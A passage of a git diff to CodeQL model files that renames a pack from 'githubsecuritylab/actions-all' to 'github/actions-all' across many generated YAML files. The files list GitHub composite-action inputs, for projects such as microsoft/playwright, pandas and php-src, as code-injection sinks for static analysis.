"input.organization_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index ffe074d3dea..1c05276abe0 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index e53a58412c9..c4b67ad5c58 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index a899f727e39..a4400dde9d4 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index 0c7c2e1bded..8b5566b4996 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index 3d631e60dc3..349f66f4387 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index 2f8710d2cbd..f717bf5c5d8 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index 5490e62cdc9..b2a851a0dba 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 0c6df201a1c..054af41f284 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 7d0b894f35d..31eeed0d251 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index d85418c7a41..97adf115bd2 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index 074cf066e37..926230e2282 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index c4497b59af8..0827f770e31 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index cc28e15a55b..9314532b426 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index 76fb41dadf1..961ad291c0d 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index b786a672140..d2a963c237e 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 236ac8f2cd2..809fde33877 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 64207dbca6a..002a93c1249 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index 46de0ff86c6..67404b9f311 100644 --- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index a07b223777b..e4eb1d83db2 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index e3470982f53..fc29f5fc8ff 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 87535288d26..352d2550b89 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 28249c82428..954216bb04e 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 8d1bbce631f..dcb26733160 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index 3c5f85a6e79..4608da8fe61 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index 01a552361ec..e38ba9b4edf 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index ab2e86ce868..48a1bb5ca8b 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 8d6dd73bfd9..744b025fa65 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index a20cbb1e24d..d6c91a3853c 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 62785bef86b..e49d896bce0 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 9c10a54abc7..66240fb41c3 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index 4145ec19569..e9fbe3a2950 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index 5b63c9fec06..bd94706b140 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index f21389b08b0..39324776e80 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 1a6f42c25f6..80c781f72df 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index ea48b84310c..abee0f74453 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 4e953d695f8..9a20261be90 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 32040ef84ea..a8c9d3fabce 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index b258ea1ce2d..c222d5e1fd9 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index c0a51345ae6..0a8427f29e4 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index f362cd1f72b..52a2001db13 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 35474e6c68f..28d8cabc368 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index ce961ee6a75..f3ef4917146 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index 9ad4bb30666..6150422d177 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 5fca46427e0..ad99ed2b432 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 9f0fecbe10b..5df1a5f2230 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index cadf01dbff1..b2c5857a743 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index ec4fc1da053..93996601c8a 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index e6530a19d97..c1d90d6ab0a 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index 0bae4e91cde..d29d4d5674d 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 0acb53ba1d3..0aaacca4805 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index f1b755e796b..b69a7740079 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 7d1733d647a..6ab3f7d2bf5 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index 4bf33c9a343..f5ce35d96ad 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml 